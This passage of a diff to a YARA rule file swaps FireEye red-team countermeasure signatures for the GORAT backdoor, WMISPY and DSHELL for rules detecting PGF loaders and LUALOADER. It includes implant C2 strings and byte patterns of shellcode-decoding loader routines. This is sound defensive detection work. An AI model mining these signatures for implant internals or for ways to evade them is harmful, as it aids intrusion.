+		$rich3 = { D6 60 82 B8 92 01 EC EB 92 01 EC EB 92 01 EC EB 9B 79 7F EB 94 01 EC EB 1A 66 ED EA 90 01 EC EB 1A 66 E9 EA 98 01 EC EB 1A 66 E8 EA 9A 01 EC EB 1A 66 EF EA 90 01 EC EB C9 69 ED EA 91 01 EC EB 92 01 ED EB AF 01 EC EB 93 6C E5 EA 96 01 EC EB 93 6C 13 EB 93 01 EC EB 93 6C EE EA 93 01 EC EB }
+		$rich4 = { 41 36 64 33 05 57 0A 60 05 57 0A 60 05 57 0A 60 73 CA 71 60 01 57 0A 60 0C 2F 9F 60 04 57 0A 60 0C 2F 89 60 3D 57 0A 60 0C 2F 8E 60 0A 57 0A 60 05 57 0B 60 4A 57 0A 60 0C 2F 99 60 06 57 0A 60 73 CA 67 60 04 57 0A 60 0C 2F 98 60 04 57 0A 60 0C 2F 80 60 04 57 0A 60 22 91 74 60 04 57 0A 60 0C 2F 9B 60 04 57 0A 60 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 15MB and ( ( $rich1 at 128 ) or ( $rich2 at 128 ) or ( $rich3 at 128 ) or ( $rich4 at 128 ) )
 }
-
-rule FIREEYE_RT_APT_Backdoor_Win_GORAT_4 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_PGF_5 : FILE
 {
 	meta:
-		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and exports numerous functions that are known to be exported by the Gorat implant. This is done in an effort to provide detection for packed samples that may not have other strings but will need to replicate exports to maintain functionality."
+		description = "PGF payload, generated rule based on symfunc/a86b004b5005c0bcdbd48177b5bac7b8"
 		author = "FireEye"
-		id = "fa3bcaad-c210-5b9c-8567-fe85b8e78055"
-		date = "2021-03-03"
-		modified = "2021-03-03"
+		id = "376875f3-00f2-58d0-ae22-7f52ea566da2"
+		date = "2020-12-09"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_4.yar#L5-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_5.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
-		logic_hash = "ec201614cb91fae9d7c89febfa22dfd6ba7f353e0eeb0b2fec6c8d887992e79e"
+		hash = "8c91a27bbdbe9fb0877daccd28bd7bb5"
+		logic_hash = "dfff615a1d329cf181294f7b0a32c11a21d66ff8a6aa6b9fcd183c9738369623"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-		rev = 8
+		rev = 3
 
 	strings:
-		$mz = "MZ"
+		$cond1 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 10 30 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 5C 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 00 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 }
+		$cond2 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 20 33 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 58 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 2C 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 }
+		$cond3 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 C7 45 ?? 00 00 00 00 C6 85 ?? ?? ?? ?? 00 68 03 01 00 00 6A 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 ?? 00 00 00 00 C6 45 ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 6A 01 6A 00 8D 8D ?? ?? ?? ?? 51 6A 00 68 9C 10 00 10 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 6A 14 FF 15 ?? ?? ?? ?? 83 C4 04 89 45 ?? 8B 45 ?? 8A 48 ?? 88 4D ?? 8B 55 ?? 83 C2 0C 8B 45 ?? 8B 0A 89 08 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 52 ?? 89 50 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 85 ?? ?? ?? ?? 83 C0 01 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 14 7D ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 11 0F B6 45 ?? 33 D0 8B 4D ?? 03 8D ?? ?? ?? ?? 88 11 EB ?? 8B 55 ?? 8B 42 ?? 89 45 ?? 6A 40 68 00 30 00 00 8B 4D ?? 51 6A 00 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B 45 ?? 83 C0 20 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 83 C2 01 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 09 8B 85 ?? ?? ?? ?? 99 BE 14 00 00 00 F7 FE 8B 45 ?? 0F B6 14 10 33 CA 8B 45 ?? 03 85 ?? ?? ?? ?? 88 08 EB ?? 8B 4D ?? 89 4D ?? FF 55 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 }
+		$cond4 = { 8B FF 55 8B EC 81 EC 3? ?1 ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 E0 56 C7 45 F8 ?? ?? ?? ?? C6 85 D8 FE FF FF ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 D9 FE FF FF 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 F4 ?? ?? ?? ?? C6 45 E7 ?? C7 45 E8 ?? ?? ?? ?? C7 45 EC ?? ?? ?? ?? C7 45 FC ?? ?? ?? ?? C7 45 F? ?? ?? ?? ?0 6A ?? 6A ?? 8D 8D D8 FE FF FF 51 6A ?? 68 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 F8 6A ?? FF ?? ?? ?? ?? ?? 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 ?? ?? 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF ?? ?? ?? ?? EB ?? 8B 85 D4 FE FF FF 83 C? ?1 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D ?? 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB ?? 8B 55 F8 8B 42 08 89 45 FC 6A ?? 68 ?? ?? ?? ?? 8B 4D FC 51 6A ?? FF ?? ?? ?? ?? ?? 89 45 EC 8B 55 FC 52 8B 45 F8 83 ?? ?? 50 8B 4D EC 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 D0 FE FF FF ?? ?? ?? ?? EB ?? 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 ?? 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE ?? ?? ?? ?? F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB ?? 8B 4D EC 89 4D F0 FF ?? ?? 5E 8B 4D E0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 }
 
 	condition:
-		$mz at 0 and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and pe.exports ( "MemoryCallEntryPoint" ) and pe.exports ( "MemoryDefaultAlloc" ) and pe.exports ( "MemoryDefaultFree" ) and pe.exports ( "MemoryDefaultFreeLibrary" ) and pe.exports ( "MemoryDefaultGetProcAddress" ) and pe.exports ( "MemoryDefaultLoadLibrary" ) and pe.exports ( "MemoryFindResource" ) and pe.exports ( "MemoryFindResourceEx" ) and pe.exports ( "MemoryFreeLibrary" ) and pe.exports ( "MemoryGetProcAddress" ) and pe.exports ( "MemoryLoadLibrary" ) and pe.exports ( "MemoryLoadLibraryEx" ) and pe.exports ( "MemoryLoadResource" ) and pe.exports ( "MemoryLoadString" ) and pe.exports ( "MemoryLoadStringEx" ) and pe.exports ( "MemorySizeofResource" ) and pe.exports ( "callback" ) and pe.exports ( "crosscall2" ) and pe.exports ( "crosscall_386" )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and any of them
 }
-rule FIREEYE_RT_APT_Backdoor_Win_GORAT_2 : FILE
+rule FIREEYE_RT_APT_Loader_Win_PGF_1 : FILE
 {
 	meta:
-		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and has the Go build ID strings. Then checks for various strings known to be in the Gorat implant including strings used in C2 json, names of methods, and the unique string 'murica' used in C2 comms. A check is done to ensure the string 'rat' appears in the binary over 1000 times as it is the name of the project used by the implant and is present well over 2000 times."
+		description = "PDB string used in some PGF DLL samples"
 		author = "FireEye"
-		id = "e2c47711-d088-5cb4-8d21-f8199a865a28"
-		date = "2020-12-09"
-		modified = "2020-12-09"
+		id = "14e2102c-3572-5314-999c-ff3f6c94de03"
+		date = "2024-03-04"
+		modified = "2024-03-04"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_2.yar#L4-L34"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
-		logic_hash = "8efc904498386d89879766a5021148a250f639bc328df12a34cfc8d620df6f6c"
+		hash = "013c7708f1343d684e3571453261b586"
+		logic_hash = "9dede268d33a38e980026917bd01bc47a72bfe60ba4a999c91eb727a2f377462"
 		score = 75
-		quality = 50
+		quality = 48
 		tags = "FILE"
-		rev = 7
+		rev = 6
 
 	strings:
-		$go1 = "go.buildid" ascii wide
-		$go2 = "Go build ID:" ascii wide
-		$json1 = "json:\"pid\"" ascii wide
-		$json2 = "json:\"key\"" ascii wide
-		$json3 = "json:\"agent_time\"" ascii wide
-		$json4 = "json:\"rid\"" ascii wide
-		$json5 = "json:\"ports\"" ascii wide
-		$json6 = "json:\"agent_platform\"" ascii wide
-		$rat = "rat" ascii wide
-		$str1 = "handleCommand" ascii wide
-		$str2 = "sendBeacon" ascii wide
-		$str3 = "rat.AgentVersion" ascii wide
-		$str4 = "rat.Core" ascii wide
-		$str5 = "rat/log" ascii wide
-		$str6 = "rat/comms" ascii wide
-		$str7 = "rat/modules" ascii wide
-		$str8 = "murica" ascii wide
-		$str9 = "master secret" ascii wide
-		$str10 = "TaskID" ascii wide
-		$str11 = "rat.New" ascii wide
+		$pdb1 = /RSDS[\x00-\xFF]{20}c:\\source\\dllconfig-master\\dllsource[\x00-\xFF]{0,500}\.pdb\x00/ nocase
+		$pdb2 = /RSDS[\x00-\xFF]{20}C:\\Users\\Developer\\Source[\x00-\xFF]{0,500}\\Release\\DllSource\.pdb\x00/ nocase
+		$pdb3 = /RSDS[\x00-\xFF]{20}q:\\objchk_win7_amd64\\amd64\\init\.pdb\x00/ nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 15MB and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_WMISPY_2 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_PGF_2 : FILE
 {
 	meta:
-		description = "wql searches"
+		description = "base.js, ./lib/payload/techniques/jscriptdotnet/jscriptdotnet_payload.py"
 		author = "FireEye"
-		id = "474af878-a657-54bc-a063-04532df928d4"
-		date = "2020-12-09"
+		id = "c5f2ec90-cd9b-53ce-893b-e44192fcd507"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/APT_HackTool_MSIL_WMISPY_2.yar#L4-L24"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_2.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3651f252d53d2f46040652788499d65a"
-		logic_hash = "553fc1e536482a56b3228a5c9ebac843af9083e8ac864bf65c81b36a39ca5e5e"
+		hash = "7c2a06ceb29cdb25f24c06f2a8892fba"
+		logic_hash = "b962ea30c063009c0383e25edda3a65202bea4496d0d6228549dcea82bba0d03"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 1
 
 	strings:
-		$MSIL = "_CorExeMain"
-		$str1 = "root\\cimv2" wide
-		$str2 = "root\\standardcimv2" wide
-		$str3 = "from MSFT_NetNeighbor" wide
-		$str4 = "from Win32_NetworkLoginProfile" wide
-		$str5 = "from Win32_IP4RouteTable" wide
-		$str6 = "from Win32_DCOMApplication" wide
-		$str7 = "from Win32_SystemDriver" wide
-		$str8 = "from Win32_Share" wide
-		$str9 = "from Win32_Process" wide
+		$sb1 = { 2? 00 10 00 00 0A 1? 40 0? 72 [4] 0? 0? 28 [2] 00 0A 0? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 0? 74 [2] 00 01 28 [2] 00 0A 6? 0? 0? 28 [2] 00 06 D0 [2] 00 01 28 [2] 00 0A 1? 28 [2] 00 0A 79 [2] 00 01 71 [2] 00 01 13 ?? 0? 1? 11 ?? 0? 74 [2] 00 01 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 13 ?? 1? 13 ?? 7E [2] 00 0A 13 ?? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 1? 11 ?? 11 ?? 1? 11 ?? 28 [2] 00 06 }
+		$ss1 = "\x00CreateThread\x00"
+		$ss2 = "\x00ScriptObjectStackTop\x00"
+		$ss3 = "\x00Microsoft.JScript\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and $MSIL and all of ( $str* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Wmispy_1 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_PGF_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIspy' project."
+		description = "base.cs"
 		author = "FireEye"
-		id = "ac394751-da40-564b-8e24-8f353326b46a"
-		date = "2020-12-09"
+		id = "39d9821f-86e8-528a-a0a9-287dbe325484"
+		date = "2020-11-24"
+		date = "2020-11-24"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/HackTool_MSIL_WMIspy_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "a5a9f7c7a7bfe474e8b21306ea220b4d476832f3ad4fafdd8967a2250d15a701"
+		hash = "a495c6d11ff3f525915345fb762f8047"
+		logic_hash = "4174ed53336f3951d26282dc81b99b2044ac6350d4b4c0074194a9b4acecefee"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$typelibguid0 = "5ee2bca3-01ad-489b-ab1b-bda7962e06bb" ascii nocase wide
+		$sb1 = { 72 [4] 6F [2] 00 0A 26 [0-16] 0? 6F [2] 00 0A [1-3] 0? 28 [2] 00 0A [0-1] 0? 72 [4-5] 0? 28 [2] 00 0A [0-1] 0? 6F [2] 00 0A 13 ?? 1? 13 ?? 38 [8-16] 91 [3-6] 8E 6? 5D 91 61 D2 9C 11 ?? 1? 58 13 [3-5] 8E 6? 3F }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_Dshell_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_PGF_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "base dlls: /lib/payload/techniques/unmanaged_exports/"
 		author = "FireEye"
-		id = "dad763bd-0e4a-542a-9920-ece11d23ce24"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "1af4f2ce-c540-5836-a749-43a0b08609b1"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_1.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "12c3566761495b8353f67298f15b882c"
-		logic_hash = "79643f9c252765647d80f6fe1ee7bb698fbc6a6c3a0ff1fd819a09bff031907c"
+		hash = "383161e4deaf7eb2ebeda2c5e9c3204c"
+		logic_hash = "d3fb0bd7b678b19ee2e0e846f4e13e4ce7e2629ecda123f34ef52f2af42d2a8e"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 }
-		$sb2 = { FF 7? 0C B? [4-16] FF 7? 08 5? [0-12] E8 [4] 84 C0 74 05 B? 01 00 00 00 [0-16] 80 F2 01 0F 84 }
-		$ss1 = "\x00CreateThread\x00"
-		$ss2 = "base64.d" fullword
-		$ss3 = "core.sys.windows" fullword
+		$sb1 = { 6A ?? FF 15 [4-32] 8A ?? 04 [0-32] 8B ?? 89 ?? 8B [2] 89 [2] 8B [2] 89 ?? 08 8B [2] 89 [2] 8B [2] 89 [2-64] 8B [5] 83 ?? 01 89 [5] 83 [5-32] 0F B6 [1-2] 0F B6 [1-2] 33 [1-16] 88 ?? EB }
+		$sb2 = { 6A 40 [0-32] 68 00 30 00 00 [0-32] 6A 00 [0-16] FF 15 [4-32] 89 45 [4-64] E8 [4-32] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [2-64] FF ( D? | 55 ) }
+		$sb3 = { 8B ?? 08 03 ?? 3C [2-32] 0F B? ?? 14 [0-32] 8D [2] 18 [2-64] 0F B? ?? 06 [3-64] 6B ?? 28 }
 
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_Dshell_3 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_LUALOADER_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'lualoader' project."
 		author = "FireEye"
-		id = "6b6fccef-ac93-5f1b-b9b6-c2d3ee4d8da7"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "e8480cf8-1852-5572-8e92-c0ae676b7507"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_3.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_HackTool_MSIL_LUALOADER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "12c3566761495b8353f67298f15b882c"
-		logic_hash = "ec2a8b0abc6cb6d1861199b892fbe84782b42babb08e3ea203d10ab17ff7a20a"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "7e9f9836ec91aa66c8779588cfceff718487f0cb5048d17538c947aba687a4cf"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 }
-		$ss1 = "\x00CreateThread\x00"
-		$ss2 = "base64.d" fullword
-		$ss3 = "core.sys.windows" fullword
+		$typelibguid0 = "8b546b49-2b2c-4577-a323-76dc713fe2ea" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_Dshell_2 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "ae34d547-d979-5ce2-bcf8-a5b4e4567de3"
-		date = "2020-11-27"
-		date = "2020-11-27"
-		modified = "2020-12-09"
+		id = "f2826dbb-f0a4-5361-94d1-8509c60c4131"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_2.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_2.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "590d98bb74879b52b97d8a158af912af"
-		logic_hash = "958ff45add46c0a43e839e8007c1d9296ee89ddd8c045b8ec6b031b225207a6c"
+		logic_hash = "700927768669eda6976071306e991bfaae136279f4265980521597c699fbed88"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 2
 
 	strings:
-		$sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 }
-		$ss1 = "\x00CreateThread\x00"
-		$ss2 = "base64.d" fullword
-		$ss3 = "core.sys.windows" fullword
-		$ss4 = "C:\\Users\\config.ini" fullword
-		$ss5 = "Invalid config file" fullword
+		$ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00"
+		$ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00"
+		$ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00"
